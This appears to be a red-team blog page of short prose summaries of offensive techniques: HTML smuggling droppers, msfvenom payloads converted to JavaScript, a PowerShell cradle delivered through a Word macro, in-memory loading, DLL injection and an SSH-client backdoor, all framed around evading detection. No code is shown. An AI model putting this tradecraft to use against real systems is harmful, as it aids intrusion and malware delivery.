ninjasecurity

A great way to obtain an intial foothold when doing covert ops is HTML smuggling. The idea is to get the client side to click on an HTML file. This will automatically download a file of choice which will connect back to our C2 Channel. I used msfvenom to create the payload in raw format then fed this to Sharpshooter which converts the payload to Javascript. I could have used DotNetToJScript do this, however this way is much quicker. Keep in mind from an Opsec perspective, Sharpshooter might be signatured in todays security tools. I base64 encode our Javascript payload. Then place the payload into a JavaScript Blob into my dropper. This dropper has a base64 decryption routine embedded.

DotNetToJScript is an excellent tool to bypass security devices. Earlier I showed using Sharpshooter quicker version of it as its built in python. However these days, security tools have Sharpshooter signatured so it is not Opsec friendly. In this scenario, I create a payload in csharp with msfvenom. From here, add this shellcode into the byte array of the below code. The code uses Win32 APIs from kernel32.dll to do its memory mapping. After compiling, we must use DotNetToJScript.exe to convert the file into a weaponized format, js.

In this Video, I demonstrate how I weaponized the Powershell Dropper and deliver via a Microsoft Word Macro through a Powershell Download Cradle. This isn't OPSEC Safe, because the Powershell Download Cradle is signatured. However you could be as creative as you want.

Powershell droppers are extremely useful when working off the land. I find that using Powershell reflection techniques that doesn't touch disk works a treat. It means that we have the ability to invoke Win32 API’s from code that executes entirely in memory.

There are different types of injections in which is OPsec safe. The reason to implement an injection technqniue in your implant is to fly under the rader without getting caught. Something like Remote Process Injection, DLL Injections and Process Hollowing are all excellent choices. The one that I’ll be completing today is DLL Injections. Before anything, we create a custom DLL from msfvenom. Then we import the required APIs by using P/Invoke DLLimport statements on pinvoke.net.

This is a custom technique used to created to backdoor via a SSH client. Threat Actors use this specific technique to hide malware. In this demonstration, I used calc.exe as an example of the payload. In real life scenarios, malicious actors will use a C2 implant as a payload to obtain a stable connection back to their Command and Control Center. Is your organisation safe guarded by this technique?